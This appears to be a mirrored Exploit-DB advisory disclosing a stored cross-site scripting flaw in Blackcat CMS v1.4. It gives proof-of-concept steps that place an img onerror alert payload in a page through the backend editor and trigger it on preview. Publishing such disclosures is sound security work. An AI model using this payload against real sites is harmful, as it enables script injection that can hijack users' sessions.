[webapps] Blackcat Cms v1.4

[webapps] Blackcat Cms v1.4 - Stored XSS
2023-7-19 08:0:0 Author: www.exploit-db.com(查看原文) 阅读量:8 收藏

Exploit Title: Blackcat Cms v1.4 - Stored XSS
Application: blackcat Cms
Version: v1.4
Bugs:  Stored XSS
Technology: PHP
Vendor URL: https://blackcat-cms.org/
Software Link: https://github.com/BlackCatDevelopment/BlackCatCMS
Date of found: 13.07.2023
Author: Mirabbas Ağalarov
Tested on: Linux 


2. Technical Details & POC
========================================
steps: 

1. login to account
2. go to pages (http://localhost/BlackCatCMS-1.4/upload/backend/pages/modify.php?page_id=1)
3. set as <img src=x onerror=alert(4)>
4. Visit http://localhost/BlackCatCMS-1.4/upload/page/welcome.php?preview=1

文章来源: https://www.exploit-db.com/exploits/51604
如有侵权请联系:admin#unsafe.sh